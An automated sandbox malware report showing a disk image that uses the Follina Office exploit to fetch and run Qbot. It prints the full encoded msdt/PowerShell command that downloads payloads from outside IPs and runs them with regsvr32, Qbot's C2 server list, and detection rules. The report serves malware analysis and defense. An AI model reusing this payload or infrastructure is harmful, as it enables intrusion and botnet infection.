Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
68101181_048154.img

Overview

General Information

Sample Name:68101181_048154.img
Analysis ID:640918
MD5:a623c3499f992a05c4ee5b9b2d3858f8
SHA1:ade8126beb9690929fd253686534b77a97ab4c44
SHA256:c77c63b0ad713ca97776305af4b22cd934271fec00f3c8029bdbbfcf8cd1ed98
Infos:

Detection

CryptOne, Follina CVE-2022-30190, Qbot
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Qbot
Yara detected CryptOne packer
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Snort IDS alert for network traffic
Maps a DLL or memory area into another process
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Document exploit detected (process start blacklist hit)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
PE file does not import any functions
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Found evasive API chain checking for process token information
Contains capabilities to detect virtual machines
Spawns drivers
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 5248 cmdline: C:\Windows\system32\cmd.exe /c powershell.exe -ex bypass -command Mount-DiskImage -ImagePath "C:\Users\user\Desktop\68101181_048154.img" MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • conhost.exe (PID: 6140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6088 cmdline: powershell.exe -ex bypass -command Mount-DiskImage -ImagePath "C:\Users\user\Desktop\68101181_048154.img" MD5: DBA3E6449E97D4E3DF64527EF7012A10)
  • udfs.sys (PID: 4 cmdline: MD5: 6A442723D4D05D9F15D24C9942CDA00D)
  • WINWORD.EXE (PID: 2896 cmdline: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /n "E:\doc276.docx" /o " MD5: 0B9AB9B9C4DE429473D6450D4297A123)
    • MSOSYNC.EXE (PID: 3532 cmdline: C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe MD5: EA19F4A0D18162BE3A0C8DAD249ADE8C)
    • MSOSYNC.EXE (PID: 1476 cmdline: C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe MD5: EA19F4A0D18162BE3A0C8DAD249ADE8C)
    • msdt.exe (PID: 6148 cmdline: C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JABwACAAPQAgACQARQBuAHYAOgB0AGUAbQBwADsAaQB3AHIAIABoAHQAdABwADoALwAvADEAMAA0AC4AMwA2AC4AMgAyADkALgAxADMAOQAvACQAKAByAGEAbgBkAG8AbQApAC4AZABhAHQAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAHAAXAB0AC4AQQA7AGkAdwByACAAaAB0AHQAcAA6AC8ALwA4ADUALgAyADMAOQAuADUANQAuADIAMgA4AC8AJAAoAHIAYQBuAGQAbwBtACkALgBkAGEAdAAgAC0ATwB1AHQARgBpAGwAZQAgACQAcABcAHQAMQAuAEEAOwBpAHcAcgAgAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADMANAAuADIANAA3AC4AMQAxADkALwAkACgAcgBhAG4AZABvAG0AKQAuAGQAYQB0ACAALQBPAHUAdABGAGkAbABlACAAJABwAFwAdAAyAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQALgBBADsAcgBlAGcAcwB2AHIAMwAyACAAJABwAFwAdAAxAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQAMgAuAEEA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
  • explorer.exe (PID: 6656 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
  • csc.exe (PID: 7084 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ej5ypzxn\ej5ypzxn.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
    • cvtres.exe (PID: 7100 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES473B.tmp" "c:\Users\user\AppData\Local\Temp\ej5ypzxn\CSCDA8FA8A1B40543BD93F61BBD49C66867.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • csc.exe (PID: 7116 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\343kkfih\343kkfih.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
    • cvtres.exe (PID: 5072 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5EDA.tmp" "c:\Users\user\AppData\Local\Temp\343kkfih\CSCB428EC43F67D4CCE84BBCBE165F3FF83.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • regsvr32.exe (PID: 6408 cmdline: "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t.A MD5: 426E7499F6A7346F0410DEAD0805586B)
  • regsvr32.exe (PID: 6356 cmdline: "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t1.A MD5: 426E7499F6A7346F0410DEAD0805586B)
  • regsvr32.exe (PID: 6300 cmdline: "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t2.A MD5: 426E7499F6A7346F0410DEAD0805586B)
  • csc.exe (PID: 6896 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mj2renji\mj2renji.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
    • cvtres.exe (PID: 6492 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4765.tmp" "c:\Users\user\AppData\Local\Temp\mj2renji\CSCB9869C7619004D828AB967DBC926ADAE.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • cleanup

Malware Configuration

Threatname: Qbot

{"Bot id": "obama186", "Campaign": "1654596660", "Version": "403.694", "C2 list": ["67.165.206.193:993", "63.143.92.99:995", "74.14.5.179:2222", "182.191.92.203:995", "197.89.8.51:443", "89.101.97.139:443", "86.97.9.190:443", "124.40.244.115:2222", "80.11.74.81:2222", "41.215.153.104:995", "179.100.20.32:32101", "31.35.28.29:443", "202.134.152.2:2222", "109.12.111.14:443", "93.48.80.198:995", "120.150.218.241:995", "41.38.167.179:995", "177.94.57.126:32101", "173.174.216.62:443", "1.161.101.20:443", "88.224.254.172:443", "82.41.63.217:443", "67.209.195.198:443", "70.46.220.114:443", "24.178.196.158:2222", "39.44.213.68:995", "84.241.8.23:32103", "210.246.4.69:995", "92.132.172.197:2222", "91.177.173.10:995", "217.128.122.65:2222", "149.28.238.199:995", "45.76.167.26:995", "45.63.1.12:443", "144.202.2.175:443", "45.63.1.12:995", "144.202.3.39:995", "144.202.2.175:995", "45.76.167.26:443", "149.28.238.199:443", "144.202.3.39:443", "140.82.63.183:995", "140.82.63.183:443", "175.145.235.37:443", "85.246.82.244:443", "47.23.89.60:993", "187.207.131.50:61202", "176.67.56.94:443", "148.64.96.100:443", "140.82.49.12:443", "76.70.9.169:2222", "217.164.121.161:2222", "72.27.33.160:443", "108.60.213.141:443", "104.34.212.7:32103", "39.44.158.215:995", "31.48.174.63:2078", "75.99.168.194:61201", "117.248.109.38:21", "83.110.218.147:993", "82.152.39.39:443", "180.129.108.214:995", "5.32.41.45:443", "83.110.92.106:443", "197.164.182.46:993", "196.203.37.215:80", "186.90.153.162:2222", "37.186.54.254:995", "89.211.179.247:2222", "24.139.72.117:443", "201.142.177.168:443", "37.34.253.233:443", "69.14.172.24:443", "125.24.187.183:443", "208.107.221.224:443", "174.69.215.101:443", "76.25.142.196:443", "96.37.113.36:993", "173.21.10.71:2222", "73.151.236.31:443", "45.46.53.140:2222", "189.146.90.232:443", "70.51.135.90:2222", "190.252.242.69:443", "201.145.165.25:443", "47.157.227.70:443", "72.252.157.93:993", "177.205.155.85:443", "72.252.157.93:995", "187.251.132.144:22", "40.134.246.185:995", "24.55.67.176:443", "79.80.80.29:2222", "179.158.105.44:443", "72.252.157.93:990", "89.86.33.217:443", "201.172.23.68:2222", "102.182.232.3:995", "177.156.191.231:443", "39.49.96.122:995", "94.36.193.176:2222", "120.61.1.114:443", "217.164.121.161:1194", "39.41.29.200:995", "86.195.158.178:2222", "86.98.149.168:2222", "1.161.101.20:995", "124.109.35.32:995", "172.115.177.204:2222", "105.27.172.6:443", "32.221.224.140:995", "208.101.82.0:443", "71.24.118.253:443", "143.0.219.6:995", "217.165.176.49:2222", "90.120.65.153:2078", "5.203.199.157:995", "39.52.41.80:995", "148.0.56.63:443", "191.112.25.187:443", "121.7.223.45:2222", "47.156.131.10:443", "177.209.202.242:2222", "41.86.42.158:995", "106.51.48.170:50001", "41.84.229.240:443", "94.71.169.212:995", "111.125.245.116:995", "78.101.193.241:6883", "201.242.175.29:2222", "38.70.253.226:2222", "187.149.236.5:443", "217.165.79.88:443", "85.255.232.18:443", "103.246.242.202:443", "41.230.62.211:995", "67.69.166.79:2222", "42.228.224.249:2222", "172.114.160.81:995", "94.26.122.9:995", "75.99.168.194:443", "189.253.206.105:443", "81.215.196.174:443", "46.107.48.202:443"]}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\E7589548.htmMAL_Msdt_MSProtocolURI_May22Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190Tobias Michalski, Christian Burkard
    • 0x1447:$re1: location.href = "ms-msdt:
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\E7589548.htmJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\123[1].RESMAL_Msdt_MSProtocolURI_May22Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190Tobias Michalski, Christian Burkard
      • 0x1447:$re1: location.href = "ms-msdt:
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\123[1].RESJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\AEF9D296.htmMAL_Msdt_MSProtocolURI_May22Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190Tobias Michalski, Christian Burkard
        • 0x1447:$re1: location.href = "ms-msdt:
        Click to see the 1 entries

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000013.00000002.807689748.0000000003340000.00000004.00000020.00020000.00000000.sdmpSUSP_PS1_Msdt_Execution_May22Detects suspicious calls of msdt.exe as seen in CVE-2022-30190Nasreddine Bencherchali, Christian Burkard
        • 0x2920:$sa1: msdt.exe
        • 0x29ee:$sb2: IT_BrowseForFile=
        00000028.00000002.582335427.00000000047C0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_CryptYara detected CryptOne packerJoe Security
          00000028.00000002.582335427.00000000047C0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Qbot_1Yara detected QbotJoe Security
            00000026.00000002.580482048.0000000004990000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Qbot_1Yara detected QbotJoe Security
              00000026.00000002.580575177.00000000049B0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Qbot_1Yara detected QbotJoe Security
                Click to see the 14 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                38.2.regsvr32.exe.12b0184.1.unpackJoeSecurity_Qbot_1Yara detected QbotJoe Security
                  24.2.explorer.exe.8b0000.0.unpackJoeSecurity_Qbot_1Yara detected QbotJoe Security
                    39.2.regsvr32.exe.4a50184.1.unpackJoeSecurity_Qbot_1Yara detected QbotJoe Security
                      24.2.explorer.exe.8b0000.0.raw.unpackJoeSecurity_Qbot_1Yara detected QbotJoe Security
                        40.2.regsvr32.exe.47f0000.2.unpackJoeSecurity_Qbot_1Yara detected QbotJoe Security
                          Click to see the 17 entries

                          Sigma Signatures

                          No Sigma rule has matched

                          Snort Signatures

                          Timestamp:185.234.247.119192.168.2.480497622036726 06/07/22-19:21:17.785538
                          SID:2036726
                          Source Port:80
                          Destination Port:49762
                          Protocol:TCP
                          Classtype:Attempted User Privilege Gain

                          Joe Sandbox Signatures

                          Click to jump to signature section

                          Show All Signature Results
                          Source: 39.2.regsvr32.exe.4a80000.2.raw.unpackMalware Configuration Extractor: Qbot {"Bot id": "obama186", "Campaign": "1654596660", "Version": "403.694", "C2 list": ["67.165.206.193:993", "63.143.92.99:995", "74.14.5.179:2222", "182.191.92.203:995", "197.89.8.51:443", "89.101.97.139:443", "86.97.9.190:443", "124.40.244.115:2222", "80.11.74.81:2222", "41.215.153.104:995", "179.100.20.32:32101", "31.35.28.29:443", "202.134.152.2:2222", "109.12.111.14:443", "93.48.80.198:995", "120.150.218.241:995", "41.38.167.179:995", "177.94.57.126:32101", "173.174.216.62:443", "1.161.101.20:443", "88.224.254.172:443", "82.41.63.217:443", "67.209.195.198:443", "70.46.220.114:443", "24.178.196.158:2222", "39.44.213.68:995", "84.241.8.23:32103", "210.246.4.69:995", "92.132.172.197:2222", "91.177.173.10:995", "217.128.122.65:2222", "149.28.238.199:995", "45.76.167.26:995", "45.63.1.12:443", "144.202.2.175:443", "45.63.1.12:995", "144.202.3.39:995", "144.202.2.175:995", "45.76.167.26:443", "149.28.238.199:443", "144.202.3.39:443", "140.82.63.183:995", "140.82.63.183:443", "175.145.235.37:443", "85.246.82.244:443", "47.23.89.60:993", "187.207.131.50:61202", "176.67.56.94:443", "148.64.96.100:443", "140.82.49.12:443", "76.70.9.169:2222", "217.164.121.161:2222", "72.27.33.160:443", "108.60.213.141:443", "104.34.212.7:32103", "39.44.158.215:995", "31.48.174.63:2078", "75.99.168.194:61201", "117.248.109.38:21", "83.110.218.147:993", "82.152.39.39:443", "180.129.108.214:995", "5.32.41.45:443", "83.110.92.106:443", "197.164.182.46:993", "196.203.37.215:80", "186.90.153.162:2222", "37.186.54.254:995", "89.211.179.247:2222", "24.139.72.117:443", "201.142.177.168:443", "37.34.253.233:443", "69.14.172.24:443", "125.24.187.183:443", "208.107.221.224:443", "174.69.215.101:443", "76.25.142.196:443", "96.37.113.36:993", "173.21.10.71:2222", "73.151.236.31:443", "45.46.53.140:2222", "189.146.90.232:443", "70.51.135.90:2222", "190.252.242.69:443", "201.145.165.25:443", "47.157.227.70:443", "72.252.157.93:993", "177.205.155.85:443", "72.252.157.93:995", "187.251.132.144:22", "40.134.246.185:995", "24.55.67.176:443", "79.80.80.29:2222", "179.158.105.44:443", "72.252.157.93:990", "89.86.33.217:443", "201.172.23.68:2222", "102.182.232.3:995", "177.156.191.231:443", "39.49.96.122:995", "94.36.193.176:2222", "120.61.1.114:443", "217.164.121.161:1194", "39.41.29.200:995", "86.195.158.178:2222", "86.98.149.168:2222", "1.161.101.20:995", "124.109.35.32:995", "172.115.177.204:2222", "105.27.172.6:443", "32.221.224.140:995", "208.101.82.0:443", "71.24.118.253:443", "143.0.219.6:995", "217.165.176.49:2222", "90.120.65.153:2078", "5.203.199.157:995", "39.52.41.80:995", "148.0.56.63:443", "191.112.25.187:443", "121.7.223.45:2222", "47.156.131.10:443", "177.209.202.242:2222", "41.86.42.158:995", "106.51.48.170:50001", "41.84.229.240:443", "94.71.169.212:995", "111.125.245.116:995", "78.101.193.241:6883", "201.242.175.29:2222", "38.70.253.226:2222", "187.149.236.5:443", "217.165.79.88:443", "85.255.232.18:443", "103.246.242.202:443", "41.230.62.211:995", "67.69.166.79:2222",

                          Exploits

                          barindex
                          Yara detected Microsoft Office Exploit Follina CVE-2022-30190
                          Source: Yara matchFile source: dump.pcap, type: PCAP
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\E7589548.htm, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\123[1].RES, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\AEF9D296.htm, type: DROPPED
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
                          Source: Binary string: amstream.pdb source: explorer.exe, 00000018.00000003.796658393.0000000004C6F000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: amstream.pdbGCTL source: explorer.exe, 00000018.00000003.796658393.0000000004C6F000.00000004.00000800.00020000.00000000.sdmp
                          Source: C:\Windows\SysWOW64\explorer.exeCode function: 24_2_008BBCFC FindFirstFileW,FindNextFileW,
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 38_2_049BBCFC FindFirstFileW,FindNextFileW,
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 39_2_04AABCFC FindFirstFileW,FindNextFileW,
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 40_2_0481BCFC FindFirstFileW,FindNextFileW,

                          Software Vulnerabilities

                          barindex
                          Document exploit detected (process start blacklist hit)
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\msdt.exe

                          Networking

                          barindex
                          Snort IDS alert for network traffic
                          Source: TrafficSnort IDS: 2036726 ET EXPLOIT Possible Microsoft Support Diagnostic Tool Exploitation Inbound (CVE-2022-30190) 185.234.247.119:80 -> 192.168.2.4:49762
                          Source: Joe Sandbox ViewASN Name: INTERKONEKT-ASPL INTERKONEKT-ASPL
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 07 Jun 2022 17:22:39 GMTContent-Type: application/octet-streamContent-Length: 1437696Connection: keep-aliveAccept-Ranges: bytesExpires: 0Cache-Control: no-cache, no-store, must-revalidateContent-Disposition: attachment;Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e a1 0b 01 02 19 00 02 11 00 00 ea 04 00 00 00 00 00 90 0d 11 00 00 10 00 00 00 20 11 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 50 16 00 00 04 00 00 00 00 00 00 02 00 01 00 00 00 00 00 00 00 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 70 11 00 ba 25 00 00 00 00 13 00 00 48 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 11 00 6c 53 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 f4 01 11 00 00 10 00 00 00 02 11 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 f8 27 00 00 00 20 11 00 00 28 00 00 00 06 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 71 10 00 00 00 50 11 00 00 00 00 00 00 2e 11 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 ba 25 00 00 00 70 11 00 00 26 00 00 00 2e 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 6c 53 01 00 00 a0 11 00 00 54 01 00 00 54 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 48 03 00 00 00 13 00 00 48 03 00 00 a8 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 50 16 00 00 00 00 00 00 f0 15 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: GET /123.RES HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: 185.234.247.119Connection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /123.RES HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: 185.234.247.119If-Modified-Since: Fri, 03 Jun 2022 10:07:25 GMTIf-None-Match: "6299dd5d-1861"Connection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /1240405476.dat HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: 185.234.247.119Connection: Keep-Alive
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: http://b.c2r.ts.cdn.office.net/pr
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
                          Source: 68101181_048154.imgString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                          Source: 68101181_048154.imgString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/Nhttp://www.borland.com/namespaces/Types
                          Source: regsvr32.exe, 00000026.00000002.580066924.0000000000EFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/vr$
                          Source: 68101181_048154.imgString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                          Source: 68101181_048154.imgString found in binary or memory: http://schemas.xmlsoap.org/soap/http
                          Source: 68101181_048154.imgString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                          Source: 68101181_048154.imgString found in binary or memory: http://schemas.xmlsoap.org/wsdl/mime/
                          Source: 68101181_048154.imgString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap/
                          Source: 68101181_048154.imgString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap/#
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: http://weather.service.msn.com/data.aspx
                          Source: regsvr32.exe, 00000026.00000002.580066924.0000000000EFA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000027.00000002.579610608.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000028.00000002.580321314.0000000000907000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.borland.com/namespaces/Types
